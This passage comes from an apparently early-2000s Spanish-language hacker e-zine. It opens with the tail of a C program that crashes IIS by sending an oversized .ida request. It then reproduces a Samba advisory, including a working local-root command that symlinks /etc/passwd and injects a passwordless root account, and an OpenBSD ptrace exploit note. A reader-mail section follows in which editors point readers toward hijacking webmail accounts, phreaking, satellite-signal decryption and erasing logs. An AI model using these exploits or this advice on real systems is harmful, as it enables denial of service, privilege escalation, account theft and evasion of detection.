int fd; struct sockaddr_in sin; struct hostent *rhost; if(argc<2) { fprintf(stderr,"Use : %s host\n",argv[0]); exit(0); } bzero(mensaje,strlen(mensaje)); bof=(char *)malloc(240); // 240 segun eeye , si se le da mas NO anda memset(bof,'A',240); sprintf(mensaje,"GET /NULL.ida?%s=X HTTP/1.0\n\n",bof); #ifdef DEBUG printf("\nMenssage : \n%s\n",mensaje); #endif if ((rhost=gethostbyname(argv[1]))==NULL){ printf("\nCan't find remote host %s \t E:%d\n",argv[1],h_errno); return -1; } sin.sin_family=AF_INET; sin.sin_port=htons(80); memcpy(&sin.sin_addr.s_addr, rhost->h_addr, rhost->h_length); fd = socket(AF_INET,SOCK_STREAM,6); if (connect(fd,(struct sockaddr *)&sin, sizeof(struct sockaddr))!=0){ printf("\nCan't Connect to The host %s. May be down ? E:%s\n",argv[1],stre rror(errno)); return -1; } printf("Sending string........\n"); if(send(fd,mensaje,strlen(mensaje),0)==-1){ printf("\nError \n"); return -1; } printf("\nString Sent... try telnet host 80 to check if IIS is down\n"); close(fd); return 0; } ***************************************************************************** Creacion de archivos remotamente en smbd Autor: Michal Zalewski <lcamtuf@razor.bindview.com> Fuente: Post a Bugtraq de Michal Zalewski

Debido a una insuficiente validacion de parametros en el daemon smbd (Samba) de *ix, y a una configuracion por defecto insegura, numerosos sistemas corriendo smbd (2.0.7 y 2.0.8 son las versiones al vulnerables al parecer), son vulnerables a ataques remotos. El daemon samba guarda logs de sesiones SMB por defecto en el archivo /var/log/samba/<nombre-netbios>.log. Si el atacante se conectara por ejemplo desde LALALA, los logs de esa coneccion quedarian guardados en /var/log/samba/lalala.log. El problema es que si el atacante se conecta por ejemplo desde un sistema llamado '../../../owned', la coneccion seria aceptada, y a demas se crearia el archivo /owned.log. (en el cual el atacante puede escribir contenidos altamente dependientes de el) La vulnerabilidad es explotable si la siguiente lina se encuentra en el archivo smb.conf: log file = /var/log/samba/%m.log El path puede cambiar, lo importante es que la %m (que samba substituye por el nombre netbios cuando llega una conexion) vaya antes que el .log, de otra forma la explotacion seria muy dificil. Un ejemplo de explotacion (tomado del advisory orginal, en el cual ganariamos privilegios de root a partir de un usuario normal en un sistema corriendo una version vulnerable de samba), seria el siguiente: $ ln -s /etc/passwd /tmp/x.log $ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \ -n ../../../tmp/x -N donde 'NIMUE' es el netbios hostname del servidor vulnerable. $ su toor # ***************************************************************************** Compromiso de root local en OpenBSD 2.8, 2.9 (posiblemente otras versiones) Autor: Georgi Guninski Fuente: Post a Bugtraq de Georgi Guninski Existe un compromiso de root local en OpenBSD 2.8, 2.9 debido a una "race condition" posiblemente en el kernel. "forkeando" unos cuantos procesos es posible adjuntarse (attach) a un proceso SUID con ptrace(). El proceso parece estar en un estado extra~o cuando es "attacheado". Contrario a la informacion que se encuentra en la manpage, PT_DETACH permite especificar una direccion en la cual el proceso continua su ejecucion. Exploit: http://www.guninski.com/vvopenbsd.c *****************************************************************************

Agradecimientos a: PacketStorm Securityfocus Hispasec Y muchas otras que no recuerdo... :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 16. Ha llegado mail ::--.. by CDLR De: N3kr1s [mailto:n3kr1s@bigfoot.com] Asunto: Hack Team en Uruguay Hola Proyecto R, Espero ke se encuentren bien, bueno voy a empezar; Me presento como veran soy "N3kr1s", de Uruguay, alguien ke hace tiempo (3 a~os aprox.) esta intentado reunir a hackers Uruguayos para formar el primer Team de Hackers de nuestro pais, con esto no estoy queriendo decir ke no existe ningun grupo en el medio (Uruguay), seguramente los hay lo ke quiero decir es ke me parece ke estan un poco escondidos. Como sabran lo ke si existen (Y MUCHOS) son "ni~os" en la red jugando con el Netbus, Subseven, Deep Throat, Bo y algun ke otro Troyanito, (sin ofender a los troyanos, porke algunos son interesantes herramientas, pero para lo ke las usan ellos son para diversion y destruccion con eso inconscientemente estan perjudicando la verdadera imagen de el hacker, ke lo ke busca (entre otras cosas) es aprender cada dia algo nuevo, e intentar aportar experiencias, conocimientos, etc. nuevos a la inet y al under, pero gente con ganas de aprender realmente, SON CONTADOS CON LOS DEDOS LOS POCOS KE HAY. (estoy hablando en Uruguay) Hace un tiempo le hable a "Pedro Cambell" [el primer hacker uruguayo ke entro a el LATU, (Lab. Tecnologico del Uruguay) o al primero ke lo pescaron je je je ;-P] y le propuse esto del grupo, a lo ke el me contesto, ke iba a pensar en la propuesta, el estaba interesado, pero no tenia mucho tiempo disponible (factor ke de seguro le afecta a muchos, incluyendome), pero yo quede en avisarle si encontraba gente (con neuronas inquietas claro) para formarlo. Hace 2 semanas ke estoy intentando localizar a ke formaba parte de Raregazz (el era Raredudez), pero hasta el momento no me (quiero agradecer a Altekx_ H3z de Raregazz por "enan0" otro hacker uruguayo quien llevaba la lista ha respondido los mail, su ayuda).

Me parece ke "enan0" al no encontrar ningun grupo nacional, como yo se tubo ke unir a otros grupos extranjeros. El Team seria para (como cualquier otro); Difundir mas esta cultura, incentivar mas a la gente a probar cosas diferentes (ej. LINUX), ke no se limiten tanto a sistemas de "Moco$soft", y tambien reflejar el panorama under nacional y porque no mundial, analizar servers de universidades nacionales, (se sorprenderan de la cantidad de vulnerabilidades ke existe X-P), y distintas actividades ke todos conocemos.

Desde ya les agradezco por todo, principalmente a el amigo Mr.Nexus y quiero ke sepan ke aprecio su trabajo, USTEDES, ENTRE OTRAS COSAS, INTENTAN TRASMITIR UN POCO DE CONOCIMIENTO, Y LO HACEN BIEN ;-D. Perdon por hacerlo tan largo (y por alguna ke otra falta de "hortografia", sin incluir los tildes ke los suprimi), y a todos los hacker o interesados en la seguridad informatica (con conocimientos claro), y como requisito KE SEA URUGUAYO ke me manden mails: mailto: n3kr1s@bigfoot.com mailto: legion_oscura@bigfoot.com http://pagina.de/legion_oscura PD.: No intente hacer ningun texto super hiper Elite, simplemente hacer llegar mi propuesta, EL UNDER URUGUAYO LOS NECESITA, QUE ESPERAN. [Nex: Bueno, ya estuvimos hablando algo por mail... esperamos que al poner tu msg en el zine llegue a quien tenga que llegar y que podais montar un buen grupo. Animo!] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: cecilia [mailto:alaka666@xxxxx.com] Asunto: CDLR Contacto quiero aprender a hackear correos de latinmail [CHack: Estimada Cecy, dicen que con paciencia, salivita y un poco de ingenieria social puedes lograr lo que te propongas y si no consulta http://www1.gratisweb.com/hackear/ para que veas como se puede hacer.] [Nex: Eso de la paciencia y la saliva me recuerda a: "Con paciencia y con saliva, el elefante se la metio a la hormiga." Un antiguo profesor

[cucumber: Cecilia (boloco?), debo decirte que para caminar, primero debes aprender a gatear, asi que te recomendaria que leyeras las ezines (revistas electronicas): Proyecto R {1,...,11}, Raregazz, SET, JJF, etc.. que son revistas excelentes y donde puedes aprender mucho.] [ Tkr: Querida Ceci: de acuerdo a tu solicitud, me permito informar sobre los los elementos necesarios para llevar a cabo el hackeo del correo de hotmail 1. Consigue un computador (traste, box, pc, computadora, o como lo llames.) Indispensable que traiga modem 2. Consigue una cuenta hackeada de algun ISP de tu ciudad -Igual vale de otra ciudad, de todas formas la paga tu querido padre - Si no tenes muy claro este proceso puedes mirar en el anexo No.2 (mas abajito...) 3. Configurar la cuenta en tu computador (traste, box, pc, computadora, o como lo llames.) Recuerda que es indispensable que traiga modem. 4. Establece la conexion (inicio, programas, accesorios, acceso telefonico a redes y luego seleccionas la conexion que configuraste en el paso anterior. MIERDA... me equivoque, no era hotmail, era latinmail, vamos a tener que empezar de nuevo... Pero esto va creciendo en Kb's y despues el editor me jode... mejor dejemoslo para otra ocasion...]

<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Spiderman [mailto:amiga486@xxxx.com] Asunto: CDLR Contacto hi, emm, maestros, tengo 2 preguntas: el mail suyo del bigfoot se mantiene???, otra: el haktek, de donde lo puedo bajar? thanx. [Nex: a) Sip b) En google salen 1810 resultados, no me creo que ninguno lleve a nada] [CHack: Estimado Spiderman a la primera pregunta te respondo con no se, porque la ultima vez que vi a ese mail aun no habia conseguido trabaja para poder mantenerse; a lo segundo te recomiendo que te des una vuelta por astalavista.box.sk. PD: Tambien contamos con los dedos.] PD: Son un orgullo cauros, excelente e-zine, me lo toy mamando toitito, y aparte chile necesita un ente que ejerza presion... asi como cuentan conmigo, seguro que contaran con muchos ;) [cucumber: si funciona el mail de Bigfoot. Ya que contamos contigo, mandanos un articulo! siempre sera bienvenido...] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Mardol [mailto:isuamej@xxxxx.com] Asunto: CDLR Contacto Soy un chavo mexicano que quiere aprender todo acerca de hackers y que mejor que poderme integrar a su unisn... Tengo 17 a~os y estudio el primer sem. de Ing. en Computacisn., asm que ayudenme hermanos chilenos. [CHack: Estimado paisano, lo unico que te puedo decir es este negocio requiere 0.1% de inspiracion 99.9% de transpiracion, asi que vete preparando para perder sueno, amigos, familia en pos del conocimiento y por lo pronto visita zine store entre otros.] [ Tkr: mmmm, yo solia ver ese programa en tv hace mucho tiempo... luego se fue poniendo aburrido y lo repetian mucho... de todas formas fue muy divertido y creo que para muchos de nosotros tambien... alguna vez tuviste algo con la chilindrina..??] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Josi Valdis [mailto:cachete_2000@xxxxxxxx.com] Asunto: CDLR Contacto locos, yo soy un simple weon q como otros miles de trillones kiere ser uno de uds, pero creo q a diferencia de los demas q solo kieren kebrarse por sus "conocimientos", yo kiero ser un weon piola, alomejor ni mepescan y serm muy fasil para uds. cagarme el pc, pero kiero ser uno de uds. y corro el riesgo, porfa mandenle un e-mail a este lamer reculiao q les escribe terrible ilucionao q no tiene ni LInux toavma pero lo TendrA, nos vemos, y peskenme plis, bye... [CHack: Estimado Josi, pues mi caso es mas o menos como el tuyo, pero yo ya no digamos linux, ni siquiera computadora tengo es mas los email los envio hechos a mano y los pego en el monitor.] [cucumber: excelente tu entusiasmo, pero ojo, usar linux no es sinonimo de

ser hacker. De hecho, para hackear un NT, es mas facil hacerlo desde NT por ejemplo. Lo importante es que aprendas leyendo y practicando mucho. Si quieres nos puedes mandar articulos, esa es la mejor forma de aportar con nosotros.] [Tkr: Primero, nosotros no nos cargamos los pc's de nadie, segundo, no hables de linux que me hace acordar de mi D.D. de 2 Gb con Win 95 porque el sueldo no me da pa mas y mi daddy no me da ara otro...!!! bahhh... ] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: LeXInT0n [mailto:sxven0m@hotmail.com] Asunto: CDLR Contacto holas ultimamente he estado muy interesado en adquirir conocimientos hack y phreak, bueno mas phreak que hack, ya que como estudio electronica se me hace mas familiar y estoi tratando de hacer blue box...de eso te queria preguntar. ?con que frecuencia se corta aca en chile? por lo que se en estados unidos se usa una frecuencia de 2600mhz pero aca?.. [Nex: El tema de las boxes esta ya muy quemado, dudo que se puedan hacer llamadas free por estos metodos. El presente (y futuro) del phreak pasa por la telefonia celular, sin duda. ] Lo otro era sobre unos telefonos plateados de entel unos que ala insertar monedas manda una frecuencia por el auricular... bueno en eso estoy, tratando de sacar probecho..ummm. no se si te te ocurre algo auds... bueno lo otro es acerca de la famosa tarjeta de prepago con el chip esa que todos tratan de emular...yo he tratado de contruir una pero los materiales para hacerlo no son nada faciles de conseguir..(es chilito po) por eso no la pude terminar. [Nex: En la Red hay tiendas de electronica que venden remotamente y que probablemente tendran todos los componentes que buscas. Pero al loro con estos circuitos, asegurate de que el que consigues es para el sistema telefonico de tu pais, y de que esta actualizado y es poco conocido.] por eso les mando este mail por si alguien del staff pueda alludarme con alguna informacion .. de antemano se les agradece [cucumber: En chile no se escucha nada de phreacking. Alguna vez supe de un grupo que hacia algo, pero nunca mas supe de ellos. Tambien esta el ninno Moonspell que tenia algunas publicaciones de phreacking por ahi. Pero mas que eso, nada.] PD: SI ALGUIEN DE UDS SE INTERESA POR EL PHREAK QUE ME DE SU E-MAIL POR FA PARA VER SI EN CHILITO SE PUEDE HACER ALGO <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Ignacio Seron [mailto:iseron@xxxxxx.com] Asunto: CDLR Contacto de verdad los felicito por la seguridad, siempre me ha gustado, pero de verdad yo creo que soy un lamer... da lo mismo, de hecho siempre me ha molestado el hacer daqo con todo esto de internet y estas cosas... Solo 1 pregunta, se sabe algo de phreakin aca en chile? La verdad llevo aqos tratando de hacer algo interesante, pero mas que hacer tapping a alguna linea, no he logrado hacer llamadas gratis de verdad a los tel publicos,, se sabe algo al respecto?

[Nex: Jeje, como quien pregunta por la familia, y afirma que se acerca buen tiempo. Se sabe ya algo de como llamar gratis? xD [CHack: Estimado nacho, no te podria decir el caso de Chileno, pero lo que si te puedo decir es que existe muy poco escrito al respecto y normalmente las telefonicas siempre estan buscando sus huecos para evitar este tipo de cosas.] [cucumber: ponte en contacto con el compadre del mail anterior.] [Plx: por que ha nadie se le ocurre jugar con otras cosas como los boletos del metro: Materiales : Una radio grabadora , cartulina , pegamento , tijeras , cinta de audio , un boleto de metro .. y muchas ganas de jugar .. pero dejemoslo para el proximo numero] saludos gugo <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Cristian Flores [mailto:pimpan@xxxxxx.com] Asunto: CDLR Contacto que buena compadre, por fin algo de informacion al cayo, puta que me aburri buscado un codigo para una rutina, pedi ayuda en los famosos chat, donde todos lo que estan conectados se tildan de cototos computines por que te pueden banear y sacarte, pero de computacion no tienen idea, lo bueno de todo este jaleo de buscar y no encontrar fue que los halle a ud. VIVA. Me da gusto que por fin algunos chilenos esten haciendo cosas creativas y muy tecnicas. Los felicito y me comprometo a ser una HackerFan de Uds. y me gustaria darles algunas ideas que han pasado por mi mente para mejorar el acceso a INet. [CHack: Estimado Cristian, te aviso que yo tambien soy un hackerfan de mis companeros del grupo.] [cucumber: MUY pocas veces he sacado info valiosa de un chat, excepto cuando chateo con gente del grupo. Lo mas valioso se saca buscando, leyendo, etc. Veo que ya lo has hecho, pero hay que seguir compadre.. asi es la cosa.] [ Tkr: Cristian... creo que lo mejor es que no te vayas creyendo lo que cualquier guev*n te va diciendo por ahi... sigue el consejo de Cucumber, ademas tambien debes practicar, es lo mejor que puedes hacer... es en serio...] Saludos. <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: willy [mailto:webheo@xxxxxxxxx.com] Asunto: CDLR Contacto Hola espero que esto funcione alla en mi ,pais por aqui mis operaciones son basadas sobre la recepcion satelital y su decodificacion de sistemas de cryptaje en las cartas me gustaria saber si por esos lados hay gente que se meta en esto y ya hayan hecho saltar el crypto de Sky Chile

[Nex: Arf! no respiras nunca?] [CHack: Estimado willy, Decodificacion?, cryptaje?, con que se come eso?] [cucumber: algo he leido sobre Sky. Si lo encuentro te lo mando y si encuentras algo, mandalo al mail del grupo, ok?] [Plx : he sabido que por 170 lukas te integran una tarjeta con la cual puedes acceder a todos los canales de america.. incluso los cochinones .. el problema que los codigos de encripacion de cada canal se cambian cada cierto tiempo por lo cual es muy probable que esta solucion dure poco.] Un saludo Willy <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: seba [mailto:seba_emm@xxxxxxxx.com] Asunto: CDLR Contacto me gustaria seber si son chilenos, y si me podrian ayudar, me gustaria ser hacker, creo que los conocimientos que adquiera no los ocupare para mal, pues no me gustaria que me lo hicieran a mi quisiera saber si alguno de ustede me puede ayudar me gustaria aprender,me gusta conocer lo que ocupo y me siento muy desprotegido, al no conocer mucho sobre los hacler y su manera de actuar, porfavor ayudenme, si me puden dar nombres de preogramas y direecciones donde bajarlos se los agradeceria mucho pero porfavor que sean seguras, bueno de antemano muchas gracias, y espero que me ayuden [Nex: Hack no es tener programas ultra cool y mega secretos] [CHack: Estimado seba, lo mismo dijo Kevin ...] [cucumber: si, somos Chilenos, Argentinos, Colombianos, Mexicanos, Espa~oles, etc.. habemos de hartas partes de hispanoamerica, aunque el fundador (plaxius) es Chileno.] [ Tkr: Nombres de programas (tambien te doy la cantidad de cd's en que viene cada uno, asi te sera mas util): Microsoft Windows 95 -- 1 cd Enciclopedia Microsoft Encarta 2045 -- 32 cd's Microsoft Outlook Express -- Este lo puedes bajar de Inet. Recomendado del dia: El dia del tentaculo -- Lo encuentras en cualquier web de abandonware... es un juego buenisimo.] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Pato [mailto:patolukas@xxxxxxx.com] Asunto: CDLR Contacto holassssss , soy un estudiante de computacion de la serena he le hido varias de sus revistas (1,2,5), bueno , los llamaba por k tengo una pregunta , cuando se hackea, como borran el IP o como lo enmascaran ?, para que no los delanten? [Nex: En los miles de tutoriales 'how to become a juanker in 10 mins' que hay por ahi, dice que una vez dentro del sistema y con privilegios de administrador/root sencillamente tienes que buscar que y donde te han logueado y despues proceder a borrarlo, eres admin y puedes hacerlo. Lo de enmascarar la IP consiste en conectarte a una maquina y desde ella,

conectarte al objetivo. ] [ Tkr: mierda... lo estoy haciendo mal... enseguida vuelvo....] [CHack: Estimado Pato, lo borramos con con borrador y lo enmascaramos con condon.] [cucumber: leete las 3,4,6,7,8,9,10 y 11!!!. Como borramos las huellas.. eso sale en extenso en los ezines que no has leido. De hecho una parte importante del hackeo consiste en el borrado de huellas. Y lo otro, si, es con condon. Y no es broma. Investiga y sabras a que nos referimos con condon.] le hago estas preguntas por , que me facina el tema , bueno lo mio es programar la verdad no se mucho de redes e internet , mi fuerte es C++, builder, Visual B, Java , pero toy aprendiando de apoco. bueno chao ojala me respondan , bye bye. [Nex: Pues te podias currar un articulillo sobre algo de programacion. Quizas de programacion segura, que es un tema muy interesante y hay bastante poca e-info en castellano de eso.] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Francisco [mailto:xent@xxxxxxxx.org] Asunto: CDLR Contacto Hackers chilenos en contra del defaced masivo Un excelente ejemplo que demuestra que el Hacker no es destructivo , como lo tildan los medios .... Con respecto a eso, si "pretenden" que la gente cambie la mentalidad hacia los "hackers" ustedes deben empezar por hacerlo, por ejemplo como van a llamar hacker a cualquier weon? hacker a un weon que entra a un NT por el bug qliao del rds o por netbios? hacker es aquel que entra a un unix y no por exploits ni ese tipo de weas, aquel que siempre quiere aprender weas nuevas, aquel que cuando vee una wea quiere ver porque funciona no solo la ocupa porque es mas comoda, etc... Por favor si "prentenden" cambiar la mentalidad de las personas empiecen por ustedes no poniendo noticias de hackers y weas, ahi hubieran puesto tal team hizo aquella wea, pero no van a ser hackers por hacerlo? no. [cucumber: Hacker es el que entra a Unix, pero no a NT? Que definicion mas pobre, miope y errada! Concuerdo contigo que el entrar por NetBios no te convierte en hacker, pero un NT seguro puede ser mas seguro que un Unix si este esta mal configurado. Hacker no te hace el usar uno u otro sistema, para nada. A mi me han acusado de ser fanatico religioso de linux, pero no lo soy. Prefiero linux para cosas de seguridad y prefiero Windows para el dia a dia. Cosa de gustos. No por eso soy mejor o peor.] [ Tkr: Segun algunas cosas que he leido por alguna parte, y tenniendo en cuenta que algunas veces algunas de esas cosas tienen razon en algo de lo que dicen, creo que tengo algo de derecho a decir algunas cosas que pienso como por ejemplo... bahhh... se me olvido....] [ Tkr: Ahora si en serio.. lo que queria decir, es que no necesariamente un hacker tiene que entrar a un sistema (cualquiera que este sea) para demostrar que es un hacker, mas bien creo, que si esta persona tiene algo que demostrar es porque sabe que no es y nunca llegara a ser lo que en realidad quiere

ser... puede ser..??] [ Plx: sip ese fui yop y pido disculpas por el tema .. en verdad que entres a 1000 sitios y dejes 1000 avisos en la web no te convierte en hacker .. debi mencionar al team como es y no como un grupo de hackers ... lo que si no estoy de acuerdo es sobre el tema de "Entrar a un UNIX" de hecho puedo asegurarte que hay hackers que jamas han entrado a un sistema ... meditalo ... si en realidad entrar a sistemas no es la finalidad del hacker ... es algo mas que eso.] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Kuantiko [mailto:kuantiko@xxxxxxxxxx.net] Asunto: CDLR Contacto Grande cabros....ese es el verdadero espeiritu de lo que es ser un hacker y aunque no me considero uno (espero serlo algun dma), hay que hacer entender a la gente que gracias a los Hackers la internet sobrevive y el mundo avanza tecnologicamente hablando. Y que no por unos pocos lamerzillos que anden por ahi, tengan que desquitarse con alguien que lo que trata de hacer es hacernos despertar. [CHack: Estimado Kuantiko, Pues si!] [cucumber: bien dicho!] KuAnTiKo kuantiko@entelchile.net <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: pepa [mailto:the_real_pepa@xxxxxxxxx.com] Asunto: CDLR Contacto Hola, la verdad sslo hoy vine a enterarme de su existencia y de publicaciones similares en el resto del mundo, el motivo de mi tardmo encuentro con el "under infomativo" se debe a que nunca necesiti informacisn muy de vanguardia o alejada de la informacisn formal de munuales y otras cosas, pero ahora me encuentro tratando de definir un tema para mi memoria y la verdad mis conocimientos no son muy fuertes en tecnologma de vanguardia como pa' que se me ilumine la ampolleta y decir "... AH!!!! esta es la papa y se puede hacer.." ... les cuento a ver si me puedden ayudar.... Estoy trabajando con un profe que es mas engrupido que yo, o sea sabe lo mismo o menos que yo y le tinca la idea de poder implementar (por lo menos comenzar un prototipo) un "algo" (servivcio, aplicacisn, --- se entiende que ni el profe sabe lo que quiere??? ----) que permita localizar personas a travis de la llamada de un telifono celular, o sea, tener una especie de servicio central que tiene por ejemplo registreados los nzmeros de los "repartidores" y para conocer su posicisn hace una llamada (o pide que hagan una llamada a la centra, punto fijo o al que tenga un gps) para determinar dsnde esta el repartidor ..... comenci investigando por phreaking pero lo que mas encuentro en paginas asm es csmo hackerar telifonos ... que no es la idea .... creo que por ahora lo que realmente necesito es saber si de alguna forma, sin ser "la compaqma", puedo capturar la seqal de una llamada para ubicarla geograficamente????' ..... creo que es mail me queds bastante largo y sobretodo bastante latero .... pero si lo leen y me ayudan... seguro se ganaran el cielo ... jajajjaj [Nex: Pues bien, hablando en redes GSM, que es lo que yo conozco, el dato que

sabe todo el mundo es que en cualquier momento la compa~ia puede saber que celula estas utilizando, y por lo tanto, en que zona andas. Aunque esto no es una localizacion precisa en determinados terrenos donde haya pocas celulas, donde la precision puede ser de varios kilometros. Sin embargo, en la actualidad las operadoras estan sacando a la luz sus nuevas tecnologias de posicionamiento de moviles via WAP. Leyendo la documentacion supongo que sera por la funcion wtai://gsm/li, que nos devuelve algo asi: <result> = String: The return value is a string including the 8 octets of the GSM location information in hexadecimal representation as follows: Octets 1 - 3 Mobile Country & Network Codes (MCC & MNC) Octets 4 - 5 Location Area Code (LAC) Octets 6 - 7 Cell Identity Value (Cell ID) Octet 8 Timing Advance O sea, que si visitas una page WAP de alguien que disponga el 'mapa' completo de las celulas de tu compa~ia, sabra exactamente donde te encuentras. Lo dificil sera conseguir el mapa ... La verdad es que se ha hablado largo y tendido sobre la localizacion geografica de moviles, y se seguira hablando. Lo unico seguro es que el supuesto anonimato que nos daban los moviles antes de su boom no era ni sera nunca un anonimato real, :/ ] si creen que soy muy lesa y es casi obvio que se puede hacer y csmo ... haganmelo saber con las palabras mas duras si lo creen necesario ... pero les recuerdo ... que mis incursiones en la info under no tienen mas de una semana ... no los lateo mas ... si me pueden ayudar ..... se los agradeceri y tratari de ayudarlos en su publicacion con lo que sea .... por ultimo revisando la ortografia ... jajajjajaj .... [Nex: Gracias, pero ya husamos el corrector hortografico del word] saludos .... pepa (en los comienzos del under!!!!) [cucumber: Creo que podrias mandarnos un mail para ponerte en contacto con las otras personas que nos han preguntado por phreacking y cosas de electronica. Ellos podrian ayudarte.] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Apolo [mailto:apoloks@xxxxxxx.com] Asunto: CDLR Contacto Hola hace dos a~os que visito vuestra pagina y me parece exelente animo y sigan adelante en sus proyectos [Nex: Gracias....] [CHack: Estimado Apolo, gracias, seguiremos dando de que hablar.] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: clamichaque [mailto:clamichaque@xxxxxxx.com] Asunto: CDLR Contacto

Hola a todos bueno las paginas que tiene son super wenas pero me agradaria que pusieran mas informacion respecto a otras cosa como celulares, lo otro no soy un hacker per diganle al saco de wea que pillaron que borre sus log y las pwl al ingresar a un server si no te pueden detectar ahora mi pregunta es ?Ha sido un montaje? y si no es asi ?quien esta asesorando a Investigaciones? no creo que en tan poco tiempo hayan avanzado tanto; si recien tiene a varios de sus detectives estudiando informatica y lo otro necesito trabajo help plaxius ayuda???? gracias de antemano clamichaque www.chilechiko.net [CHack: Estimado clamichaque, ya le dijimos que si hacen cochinadas cuando menos las haga limpias.] [cucumber: De phreaking no sabemos mucho, pero dado el interes que he visto en los mails, hay que investigar parece. Y lo del 'loco que pillaron', no fue un montaje lamentablemente.] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Mick [mailto:folley@xxxxxx.cl] Asunto: CDLR Contacto Hola!!!!!! Me gustaria saber si tienen informacion sobre programas para decodificar la se~al de la television satelital...por lo que me he dado cuenta hay varios programas(caso todos en aleman)estoy intentando ver si se puede... segun los de hacktheplanet.com.ar (que a todo esto son super cagados con la informacion)se puede pero solo dan los programas e informacion super poca..bueno debo reconocer que recien me estoy metiendo en esto pero si logro sacar algo me comprometo a dar toda la informacion para que si a ustedes les parece a lo mejor poder publicar algo en vuestro sitio..La idea de fondo de todo esto es varias publicaciones en la red donde los hackers(no se si lo son) hablan de empresas que ganan cerros de plata con un sistema que no es tan dificil de implementar aunque parece que es ilegal, no lo se realmente , pero creo que seria bueno ver si lo podemos hacer aca y luego nos preocupamos del resto... [CHack: Estimado Mick, me imagino que solo buscas decodificar senal con fines educativos, asi que date una vuelta por http://www.hacktv.net] Gracias por el tiempo Mick <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Cristian [mailto:Cmicky009@xxxxxxxx.com] Asunto: CDLR Contacto primero me presento, soy un aficionado navegante de internet. un internauta, y he aprendido algunos husos en programas como irc. pero ahora tengo un problema,he pagado altas cuentas por el hoso del telefono. mi polola se fue fuera de temuco a santiago y yo necesito llamarla diariamente, por eso las cuentas. y he recurrido austedes para ver si me pueden dar algun tipo de ayuda algun codigo para llamar o algo. de antemano soy su agradecido. [Nex: Llamar desde casa de un amigo? ]

[CHack: Estimado Cristian, si quieres seguir en comunicacion diaria con tu chica y reducir el costo del telefono, pues facil utiliza el correo, lo malo es que se enamora del cartero.] [cucumber: Una empresa Chilena de carriers que empieza con Chile y termina con SAT, tiene un plan que pagas una cantidad ($17.000??) y hablas TODO lo que quieras a todo Chile en cualquier horario.] [Plx : el otro dia me llego un corre pidiendome que sacara a alguien de DICOM , otro preguntandome como ganar siempre en el poker a travez de estadisticas pues queria ir a un casino ... otro que queria entrar a internet gratis ... Pues esto es hacking se~ores y no cyberladrones ??? ] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Marcelo [mailto:gunsnroses@xxxxx.com] Asunto: CDLR Contacto Hola amigos, primero que todo les felicito por la iniciativa de apoyar a The Eye, ya que considero que lo que il ha realizado no es Cybercrimen, es mas bien "mostrar2 lo vulnerables que pueden llegar a ser ciertos sistemas "infalibles". Tengo 28 y soy casado y desde hace un tiempo que me llama mucho la atencisn este mundillo del Hacker y Cracker y Phreaker ( no si si esta bien escrito) pero tengo algunas dudas sobre como se forma un Hacker. Si que no me voy a encontrar con un colegio de Hacker o universidad de Hacker, pero ,como se forma uno de ustedes? [Nex: No hace mucho salio la noticia de que en Rusia habia una escuela de hackers, te daban titulo y todo. No veas que pintas tenian los de las fotos, ni el zero cool ese, xDD ] que conocimientos manejan que los hacen diferentes del comun de la gente que se sienta en su maquina win95 a escribir en el WORD? [CHack: Estimado Marcelo , pues a mi lo que me hace diferente es que tambien escribo en el EXCEL.] De cierto modo me siento orgulloso de que existan HACKER NACIONALES y MADE IN CHILE, porque hace un tiempo esto sslo era como para los gringos y nada mas, es esto lo que me motiva a escribirles y nuevamente a consultarles que se necesita para ser un HACKER? [cucumber: Hola Marcelo. No somos en nada diferentes a los entes normales. Yo uso el Word, el pico (Pine Composer para los mal pensados), etc.. y como se forma un hacker? leyendo mucho, discutiendo de cosas tecnicas, probando cosas existentes y tratando de descubrir cosas nuevas, etc. Con respecto a los hackers de otros paises, no te engannes, una gran escuela de hackers es alemania, espanna, etc... Y por ultimo en CDLR habemos de varios paises de hispanoamerica.] Un saludo muy grande y sigan adelante con su filosofma de vida. Marcelo "Gunner" <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: J.A.F. [mailto:jaf12466@xxxxx.com] Asunto: CDLR Contacto

